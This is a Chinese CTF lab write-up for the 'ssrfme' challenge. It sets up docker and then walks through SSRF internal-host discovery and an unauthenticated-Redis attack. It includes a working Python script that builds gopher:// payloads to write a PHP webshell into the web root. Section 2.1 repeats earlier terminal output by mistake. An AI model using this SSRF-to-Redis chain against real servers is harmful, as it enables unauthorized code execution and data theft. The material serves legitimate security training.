公开赛Web-ssrfme
目录
【题目考查的技术点】
1. docker配置
1.1 安装
1.2 配置
1.3 重启docker并测试
2. ssrf环境配置
2.1 准备文件并解压
2.2 拉取环境
2.3 访问测试
2.3.1 环境是否配置成功
3. 漏洞分析与复现
3.1 测试一下是否存在ssrf
3.2 获取内网IP段
3.3 内网主机检测
3.4 端口扫描
3.5 redis未授权访问攻击
3.5.1 写入payload
3.5.2 扫描主机
3.5.3 再次写入payload
【题目考查的技术点】
-
SSRF -
redis未授权访问 -
SSRF攻击内网主机上的redis
1. docker配置
1.1 安装
root@abyss:~# apt install docker.io
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
bridge-utils containerd git git-man liberror-perl pigz runc ubuntu-fan
Suggested packages:
ifupdown aufs-tools btrfs-progs cgroupfs-mount | cgroup-lite debootstrap docker-buildx docker-compose-v2 docker-doc rinse zfs-fuse | zfsutils git-daemon-run
| git-daemon-sysvinit git-doc git-email git-gui gitk gitweb git-cvs git-mediawiki git-svn
The following NEW packages will be installed:
bridge-utils containerd docker.io git git-man liberror-perl pigz runc ubuntu-fan
0 upgraded, 9 newly installed, 0 to remove and 67 not upgraded.
Need to get 82.5 MB of archives.
After this operation, 321 MB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 pigz amd64 2.6-1 [63.6 kB]
Get:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 bridge-utils amd64 1.7-1ubuntu3 [34.4 kB]
Get:3 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 runc amd64 1.1.12-0ubuntu2~22.04.1 [8,405 kB]
Get:4 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 containerd amd64 1.7.24-0ubuntu1~22.04.2 [37.3 MB]
Get:5 http://cn.archive.ubuntu.com/ubuntu jammy-updates/universe amd64 docker.io amd64 26.1.3-0ubuntu1~22.04.1 [32.5 MB]
Get:6 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 liberror-perl all 0.17029-1 [26.5 kB]
Get:7 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 git-man all 1:2.34.1-1ubuntu1.12 [955 kB]
Get:8 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 git amd64 1:2.34.1-1ubuntu1.12 [3,165 kB]
Get:9 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 ubuntu-fan all 0.12.16 [35.2 kB]
Fetched 82.5 MB in 2min 48s (490 kB/s)
Preconfiguring packages ...
Selecting previously unselected package pigz.
(Reading database ... 211881 files and directories currently installed.)
Preparing to unpack .../0-pigz_2.6-1_amd64.deb ...
Unpacking pigz (2.6-1) ...
Selecting previously unselected package bridge-utils.
Preparing to unpack .../1-bridge-utils_1.7-1ubuntu3_amd64.deb ...
Unpacking bridge-utils (1.7-1ubuntu3) ...
Selecting previously unselected package runc.
Preparing to unpack .../2-runc_1.1.12-0ubuntu2~22.04.1_amd64.deb ...
Unpacking runc (1.1.12-0ubuntu2~22.04.1) ...
Selecting previously unselected package containerd.
Preparing to unpack .../3-containerd_1.7.24-0ubuntu1~22.04.2_amd64.deb ...
Unpacking containerd (1.7.24-0ubuntu1~22.04.2) ...
Selecting previously unselected package docker.io.
Preparing to unpack .../4-docker.io_26.1.3-0ubuntu1~22.04.1_amd64.deb ...
Unpacking docker.io (26.1.3-0ubuntu1~22.04.1) ...
Selecting previously unselected package liberror-perl.
Preparing to unpack .../5-liberror-perl_0.17029-1_all.deb ...
Unpacking liberror-perl (0.17029-1) ...
Selecting previously unselected package git-man.
Preparing to unpack .../6-git-man_1%3a2.34.1-1ubuntu1.12_all.deb ...
Unpacking git-man (1:2.34.1-1ubuntu1.12) ...
Selecting previously unselected package git.
Preparing to unpack .../7-git_1%3a2.34.1-1ubuntu1.12_amd64.deb ...
Unpacking git (1:2.34.1-1ubuntu1.12) ...
Selecting previously unselected package ubuntu-fan.
Preparing to unpack .../8-ubuntu-fan_0.12.16_all.deb ...
Unpacking ubuntu-fan (0.12.16) ...
Setting up runc (1.1.12-0ubuntu2~22.04.1) ...
Setting up liberror-perl (0.17029-1) ...
Setting up bridge-utils (1.7-1ubuntu3) ...
Setting up pigz (2.6-1) ...
Setting up git-man (1:2.34.1-1ubuntu1.12) ...
Setting up containerd (1.7.24-0ubuntu1~22.04.2) ...
Created symlink /etc/systemd/system/multi-user.target.wants/containerd.service → /lib/systemd/system/containerd.service.
Setting up ubuntu-fan (0.12.16) ...
Created symlink /etc/systemd/system/multi-user.target.wants/ubuntu-fan.service → /lib/systemd/system/ubuntu-fan.service.
Setting up docker.io (26.1.3-0ubuntu1~22.04.1) ...
Adding group `docker' (GID 137) ...
Done.
Created symlink /etc/systemd/system/multi-user.target.wants/docker.service → /lib/systemd/system/docker.service.
Created symlink /etc/systemd/system/sockets.target.wants/docker.socket → /lib/systemd/system/docker.socket.
Setting up git (1:2.34.1-1ubuntu1.12) ...
Processing triggers for man-db (2.10.2-1) ...1.2 配置
root@abyss:~# cd /etc/systemd/system/
root@abyss:/etc/systemd/system# ls -all
total 128
drwxr-xr-x 21 root root 4096 4月 7 15:58 .
drwxr-xr-x 5 root root 4096 4月 5 23:55 ..
drwxr-xr-x 2 root root 4096 9月 11 2024 bluetooth.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 cloud-final.service.wants
lrwxrwxrwx 1 root root 42 4月 5 23:50 dbus-fi.w1.wpa_supplicant1.service -> /lib/systemd/system/wpa_supplicant.service
lrwxrwxrwx 1 root root 37 4月 5 23:50 dbus-org.bluez.service -> /lib/systemd/system/bluetooth.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.Avahi.service -> /lib/systemd/system/avahi-daemon.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.ModemManager1.service -> /lib/systemd/system/ModemManager.service
lrwxrwxrwx 1 root root 53 4月 5 23:50 dbus-org.freedesktop.nm-dispatcher.service -> /lib/systemd/system/NetworkManager-dispatcher.service
lrwxrwxrwx 1 root root 40 4月 5 23:50 dbus-org.freedesktop.oom1.service -> /lib/systemd/system/systemd-oomd.service
lrwxrwxrwx 1 root root 44 4月 5 23:50 dbus-org.freedesktop.resolve1.service -> /lib/systemd/system/systemd-resolved.service
lrwxrwxrwx 1 root root 36 4月 5 23:50 dbus-org.freedesktop.thermald.service -> /lib/systemd/system/thermald.service
lrwxrwxrwx 1 root root 45 4月 5 23:50 dbus-org.freedesktop.timesync1.service -> /lib/systemd/system/systemd-timesyncd.service
lrwxrwxrwx 1 root root 32 4月 5 23:50 display-manager.service -> /lib/systemd/system/gdm3.service
drwxr-xr-x 2 root root 4096 9月 11 2024 display-manager.service.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 emergency.target.wants
drwxr-xr-x 2 root root 4096 4月 5 23:54 final.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 getty.target.wants
drwxr-xr-x 2 root root 4096 4月 5 23:54 graphical.target.wants
drwxr-xr-x 2 root root 4096 4月 9 11:10 multi-user.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 network-online.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 oem-config.service.wants
drwxr-xr-x 2 root root 4096 4月 5 23:55 open-vm-tools.service.requires
drwxr-xr-x 2 root root 4096 9月 11 2024 paths.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 printer.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 rescue.target.wants
drwxr-xr-x 2 root root 4096 9月 11 2024 sleep.target.wants
-rw-r--r-- 1 root root 311 9月 11 2024 snap-bare-5.mount
-rw-r--r-- 1 root root 326 9月 11 2024 snap-core22-1612.mount
-rw-r--r-- 1 root root 326 4月 7 15:58 snap-core22-1802.mount
drwxr-xr-x 2 root root 4096 4月 7 15:58 snapd.mounts.target.wants
-rw-r--r-- 1 root root 329 9月 11 2024 snap-firefox-4848.mount
-rw-r--r-- 1 root root 344 9月 11 2024 'snap-gnome\x2d42\x2d2204-176.mount'
-rw-r--r-- 1 root root 359 9月 11 2024 'snap-gtk\x2dcommon\x2dthemes-1535.mount'
-rw-r--r-- 1 root root 326 9月 11 2024 snap-snapd-21759.mount
-rw-r--r-- 1 root root 380 9月 11 2024 'snap-snapd\x2ddesktop\x2dintegration-178.mount'
-rw-r--r-- 1 root root 380 4月 7 15:58 'snap-snapd\x2ddesktop\x2dintegration-253.mount'
-rw-r--r-- 1 root root 338 9月 11 2024 'snap-snap\x2dstore-1113.mount'
-rw-r--r-- 1 root root 338 4月 7 15:58 'snap-snap\x2dstore-1216.mount'
drwxr-xr-x 2 root root 4096 4月 9 11:10 sockets.target.wants
lrwxrwxrwx 1 root root 31 4月 5 23:57 sshd.service -> /lib/systemd/system/ssh.service
lrwxrwxrwx 1 root root 9 4月 5 23:50 sudo.service -> /dev/null
drwxr-xr-x 2 root root 4096 4月 5 23:54 sysinit.target.wants
lrwxrwxrwx 1 root root 35 4月 5 23:50 syslog.service -> /lib/systemd/system/rsyslog.service
drwxr-xr-x 2 root root 4096 4月 6 00:37 timers.target.wants
lrwxrwxrwx 1 root root 41 4月 5 23:55 vmtoolsd.service -> /lib/systemd/system/open-vm-tools.service
root@abyss:/etc/systemd/system# mkdir docker.service.d
root@abyss:/etc/systemd/system# cd docker.service.d/
root@abyss:/etc/systemd/system/docker.service.d# ls -all
total 8
drwxr-xr-x 2 root root 4096 4月 9 11:11 .
drwxr-xr-x 22 root root 4096 4月 9 11:11 ..
root@abyss:/etc/systemd/system/docker.service.d# vim http-proxy.conf
root@abyss:/etc/systemd/system/docker.service.d# cat http-proxy.conf
[Service]
Environment="HTTP_PROXY=http://192.168.142.1:7897"
Environment="HTTPS_PROXY=http://192.168.142.1:7897"
Environment="NO_PROXY=localhost,127.0.0.1,*.example.com"
root@abyss:/etc/systemd/system/docker.service.d# 1.3 重启docker并测试
root@abyss:/etc/systemd/system/docker.service.d# systemctl daemon-reload
root@abyss:/etc/systemd/system/docker.service.d# systemctl restart docker
root@abyss:/etc/systemd/system/docker.service.d# ps -ef | grep docker
root 6029 1 2 11:32 ? 00:00:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 6184 4730 0 11:32 pts/1 00:00:00 grep --color=auto docker
# 用 docker 找一下 nginx 试一下
root@abyss:/etc/systemd/system/docker.service.d# docker search nginx
NAME DESCRIPTION STARS OFFICIAL
nginx Official build of Nginx. 20738 [OK]
nginx/nginx-ingress NGINX and NGINX Plus Ingress Controllers fo… 103
nginx/nginx-prometheus-exporter NGINX Prometheus Exporter for NGINX and NGIN… 49
nginx/unit This repository is retired, use the Docker o… 65
nginx/nginx-ingress-operator NGINX Ingress Operator for NGINX and NGINX P… 2
nginx/nginx-quic-qns NGINX QUIC interop 1
nginx/nginxaas-loadbalancer-kubernetes 1
nginx/unit-preview Unit preview features 0
bitnami/nginx Bitnami container image for NGINX 199
ubuntu/nginx Nginx, a high-performance reverse proxy & we… 128
bitnamicharts/nginx Bitnami Helm chart for NGINX Open Source 0
rancher/nginx 2
kasmweb/nginx An Nginx image based off nginx:alpine and in… 8
linuxserver/nginx An Nginx container, brought to you by LinuxS… 229
dtagdevsec/nginx T-Pot Nginx 0
paketobuildpacks/nginx 0
vmware/nginx 2
chainguard/nginx Build, ship and run secure software with Cha… 4
droidwiki/nginx 0
gluufederation/nginx A customized NGINX image containing a consu… 1
intel/nginx 0
circleci/nginx This image is for internal use 2
corpusops/nginx https://github.com/corpusops/docker-images/ 1
antrea/nginx Nginx server used for Antrea e2e testing 0
docksal/nginx Nginx service image for Docksal 0 2. ssrf环境配置
2.1 准备文件并解压
root@abyss:/etc/systemd/system/docker.service.d# systemctl daemon-reload
root@abyss:/etc/systemd/system/docker.service.d# systemctl restart docker
root@abyss:/etc/systemd/system/docker.service.d# ps -ef | grep docker
root 6029 1 2 11:32 ? 00:00:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
root 6184 4730 0 11:32 pts/1 00:00:00 grep --color=auto docker
# 用 docker 找一下 nginx 试一下
root@abyss:/etc/systemd/system/docker.service.d# docker search nginx
NAME DESCRIPTION STARS OFFICIAL
nginx Official build of Nginx. 20738 [OK]
nginx/nginx-ingress NGINX and NGINX Plus Ingress Controllers fo… 103
nginx/nginx-prometheus-exporter NGINX Prometheus Exporter for NGINX and NGIN… 49
nginx/unit This repository is retired, use the Docker o… 65
nginx/nginx-ingress-operator NGINX Ingress Operator for NGINX and NGINX P… 2
nginx/nginx-quic-qns NGINX QUIC interop 1
nginx/nginxaas-loadbalancer-kubernetes 1
nginx/unit-preview Unit preview features 0
bitnami/nginx Bitnami container image for NGINX 199
ubuntu/nginx Nginx, a high-performance reverse proxy & we… 128
bitnamicharts/nginx Bitnami Helm chart for NGINX Open Source 0
rancher/nginx 2
kasmweb/nginx An Nginx image based off nginx:alpine and in… 8
linuxserver/nginx An Nginx container, brought to you by LinuxS… 229
dtagdevsec/nginx T-Pot Nginx 0
paketobuildpacks/nginx 0
vmware/nginx 2
chainguard/nginx Build, ship and run secure software with Cha… 4
droidwiki/nginx 0
gluufederation/nginx A customized NGINX image containing a consu… 1
intel/nginx 0
circleci/nginx This image is for internal use 2
corpusops/nginx https://github.com/corpusops/docker-images/ 1
antrea/nginx Nginx server used for Antrea e2e testing 0
docksal/nginx Nginx service image for Docksal 0 2.2 拉取环境
root@abyss:~/web_ssrf/web-ssrfme# docker-compose up -d
Command 'docker-compose' not found, but can be installed with:
snap install docker # version 27.5.1, or
apt install docker-compose # version 1.29.2-1 // 建议使用这种方法,上面那种方法容易出问题
See 'snap info docker' for additional versions.
// 显示没有docker-compose ,安装一下
root@abyss:~/web_ssrf/web-ssrfme# apt install docker-compose
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
The following additional packages will be installed:
python3-attr python3-distutils python3-docker python3-dockerpty python3-docopt python3-dotenv python3-jsonschema python3-pyrsistent python3-setuptools python3-texttable
python3-websocket
Suggested packages:
python-attr-doc python-jsonschema-doc python-setuptools-doc
The following NEW packages will be installed:
docker-compose python3-attr python3-distutils python3-docker python3-dockerpty python3-docopt python3-dotenv python3-jsonschema python3-pyrsistent python3-setuptools
python3-texttable python3-websocket
0 upgraded, 12 newly installed, 0 to remove and 67 not upgraded.
Need to get 911 kB of archives.
After this operation, 4,842 kB of additional disk space will be used.
Do you want to continue? [Y/n] Y
Get:1 http://cn.archive.ubuntu.com/ubuntu jammy-updates/main amd64 python3-distutils all 3.10.8-1~22.04 [139 kB]
Get:2 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-websocket all 1.2.3-1 [34.7 kB]
Get:3 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-docker all 5.0.3-1 [89.3 kB]
Get:4 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-dockerpty all 0.4.1-2 [11.1 kB]
Get:5 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-docopt all 0.6.2-4 [26.9 kB]
Get:6 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-dotenv all 0.19.2-1 [20.5 kB]
Get:7 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-attr all 21.2.0-1 [44.0 kB]
Get:8 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy-updates/main amd64 python3-setuptools all 59.6.0-1.2ubuntu0.22.04.2 [340 kB]
Get:9 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-pyrsistent amd64 0.18.1-1build1 [55.5 kB]
Get:10 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/main amd64 python3-jsonschema all 3.2.0-0ubuntu2 [43.1 kB]
Get:11 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 python3-texttable all 1.6.4-1 [11.4 kB]
Get:12 http://mirrors.tuna.tsinghua.edu.cn/ubuntu jammy/universe amd64 docker-compose all 1.29.2-1 [95.8 kB]
Fetched 911 kB in 2s (602 kB/s)
Selecting previously unselected package python3-distutils.
(Reading database ... 213203 files and directories currently installed.)
Preparing to unpack .../00-python3-distutils_3.10.8-1~22.04_all.deb ...
Unpacking python3-distutils (3.10.8-1~22.04) ...
Selecting previously unselected package python3-websocket.
Preparing to unpack .../01-python3-websocket_1.2.3-1_all.deb ...
Unpacking python3-websocket (1.2.3-1) ...
Selecting previously unselected package python3-docker.
Preparing to unpack .../02-python3-docker_5.0.3-1_all.deb ...
Unpacking python3-docker (5.0.3-1) ...
Selecting previously unselected package python3-dockerpty.
Preparing to unpack .../03-python3-dockerpty_0.4.1-2_all.deb ...
Unpacking python3-dockerpty (0.4.1-2) ...
Selecting previously unselected package python3-docopt.
Preparing to unpack .../04-python3-docopt_0.6.2-4_all.deb ...
Unpacking python3-docopt (0.6.2-4) ...
Selecting previously unselected package python3-dotenv.
Preparing to unpack .../05-python3-dotenv_0.19.2-1_all.deb ...
Unpacking python3-dotenv (0.19.2-1) ...
Selecting previously unselected package python3-attr.
Preparing to unpack .../06-python3-attr_21.2.0-1_all.deb ...
Unpacking python3-attr (21.2.0-1) ...
Selecting previously unselected package python3-setuptools.
Preparing to unpack .../07-python3-setuptools_59.6.0-1.2ubuntu0.22.04.2_all.deb ...
Unpacking python3-setuptools (59.6.0-1.2ubuntu0.22.04.2) ...
Selecting previously unselected package python3-pyrsistent:amd64.
Preparing to unpack .../08-python3-pyrsistent_0.18.1-1build1_amd64.deb ...
Unpacking python3-pyrsistent:amd64 (0.18.1-1build1) ...
Selecting previously unselected package python3-jsonschema.
Preparing to unpack .../09-python3-jsonschema_3.2.0-0ubuntu2_all.deb ...
Unpacking python3-jsonschema (3.2.0-0ubuntu2) ...
Selecting previously unselected package python3-texttable.
Preparing to unpack .../10-python3-texttable_1.6.4-1_all.deb ...
Unpacking python3-texttable (1.6.4-1) ...
Selecting previously unselected package docker-compose.
Preparing to unpack .../11-docker-compose_1.29.2-1_all.deb ...
Unpacking docker-compose (1.29.2-1) ...
Setting up python3-dotenv (0.19.2-1) ...
Setting up python3-distutils (3.10.8-1~22.04) ...
Setting up python3-attr (21.2.0-1) ...
Setting up python3-texttable (1.6.4-1) ...
Setting up python3-docopt (0.6.2-4) ...
Setting up python3-setuptools (59.6.0-1.2ubuntu0.22.04.2) ...
Setting up python3-pyrsistent:amd64 (0.18.1-1build1) ...
Setting up python3-websocket (1.2.3-1) ...
Setting up python3-dockerpty (0.4.1-2) ...
Setting up python3-docker (5.0.3-1) ...
Setting up python3-jsonschema (3.2.0-0ubuntu2) ...
Setting up docker-compose (1.29.2-1) ...
Processing triggers for man-db (2.10.2-1) ...
// 拉取环境
root@abyss:~/web_ssrf/web-ssrfme# docker-compose up -d
Creating network "web-ssrfme_default" with the default driver
Building redis
DEPRECATED: The legacy builder is deprecated and will be removed in a future release.
Install the buildx component to build images with BuildKit:
https://docs.docker.com/go/buildx/
Sending build context to Docker daemon 7.983MB
Step 1/19 : FROM ubuntu:16.04
16.04: Pulling from library/ubuntu
58690f9b18fc: Pull complete
b51569e7c507: Pull complete
da8ef40b9eca: Pull complete
fb15d46c38dc: Pull complete
......
Successfully built 4be6c24dabe9
Successfully tagged ctf/ssrfme:latest
WARNING: Image for service web was built because it did not already exist. To rebuild this image you must use `docker-compose build` or `docker-compose up --build`.
Creating web-ssrfme_redis_1 ... done
Creating web-ssrfme_web_1 ... done
// 看一下docker的映射端口
root@abyss:~/web_ssrf/web-ssrfme# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
8da4dc9e2730 ctf/ssrfme "/bin/sh -c 'cd /; .…" 3 minutes ago Up 3 minutes 0.0.0.0:8091->80/tcp, :::8091->80/tcp web-ssrfme_web_1
d05b13308fc8 web-ssrfme_redis "/usr/local/bin/dock…" 3 minutes ago Up 3 minutes 6379/tcp web-ssrfme_redis_1
root@abyss:~/web_ssrf/web-ssrfme# 2.3 访问测试
2.3.1 环境是否配置成功
访问 虚拟机IP地址:docker映射端口号 ,如果看到以上代码,就表明环境配置没有问题。
3. 漏洞分析与复现
3.1 测试一下是否存在ssrf
源码有一个url的get请求,使用www.baidu.com测试一下是否存在ssrf,结果如上所示,是存在的。那么接下来就是确定内网主机IP网段、确定内网主机的存活度,之后通过redis未授权写入文件并获取flag。
3.2 获取内网IP段
源码中有phpinfo();这个函数,通过参数info触发,它是可以打印出主机IP的,试一下
这里打印出来的主机IP是172.18.0.3说明这个内网的网段是172.18.0.x,接下来就检测内网有哪些主机是存活的。
3.3 内网主机检测
使用Yakit尝试爆破,发现IP地址为172.18.0.2的主机处于存活状态,而且它运行着http协议。
但是仅仅知道存活主机还不行,我们还要找到突破口,使用ssrf扫描都端口,看一下有没有redis服务。
3.4 端口扫描
使用Yakit扫描端口发现6379端口有回显-ERR wrong number of arguments for 'get' command 1,这是redis报错。既然有这个报错,就说明主机172.18.0.2还运行着redis服务。那就可以试一下redis未授权访问攻击。
3.5 redis未授权访问攻击
172.18.0.2这个主机及运行http协议,还运行redis,那我们就打一个redis未授权访问。我们先想办法把payload写到172.18.0.2这个主机里面,然后利用ssrf直接访问我们的payload,进而触发它,然后获取flag。
3.5.1 写入payload
由于172.18.0.2这台主机上运行着http协议,所以可以直接测试一下能不能写入html目录下。
payload生成脚本如下:
import urllib.parse
protocol = "gopher://"
ip = "172.18.0.2" # 运行着redis的内网主机ip
port = "6379"
shell = "\n\n<?php system(\"cat /flag\");?>\n\n"
filename = "web.php"
path = "/var/www/html/upload"
passwd = ""
cmd=[
"flushall",
"set 1 {}".format(shell.replace(" ","${IFS}")),
"config set dir {}".format(path),
"config set dbfilename {}".format(filename),
"save"
]
if passwd:
cmd.insert(0,"AUTH {}".format(passwd))
payload = protocol + ip + ":" + port + "/_"
def redis_format(arr):
CRLF="\r\n"
redis_arr = arr.split(" ")
cmd=""
cmd+="*"+str(len(redis_arr))
for x in redis_arr:
cmd += CRLF+"$"+str(len((x.replace("${IFS}"," "))))+CRLF+x.replace("${IFS}"," ")
cmd += CRLF
return cmd
if __name__=="__main__":
for x in cmd:
payload += urllib.parse.quote(redis_format(x))
print (payload)将输出的内容进行二次url编码,因为这个payload在写入的时候会被url解码两次,浏览器一次,redis一次。如下:
不过html目录似乎不能直接写入文件,这里测试的时候没有任何响应:
然后访问也只是显示以下内容,说明不能写入:
3.5.2 扫描主机
由于html目录不能直接写入payload,所以我们通过BurpSuit扫描一下172.18.0.2这台主机,看一下html下有没有其他的目录,能达成写入payload的条件。
扫描结果如下:
可以看到,这里存在一个upload目录,接下来测试一下写入payload。
3.5.3 再次写入payload
这次使用一个工具来生成payload。Gopherus是GitHub上的一个开源工具,但是在2025来看,相对老了,依赖的是python2,即需要在Ubuntu上安装python2。安装完成之后使用如下:
得到payload之后还用进行二次url编码,然后使用同样的方法写入。之后我到容器里面看了一眼,已经有shell.php这个文件了。
之后浏览器访问
?url=http://172.18.0.2/upload/shell.php就可以得到flag了。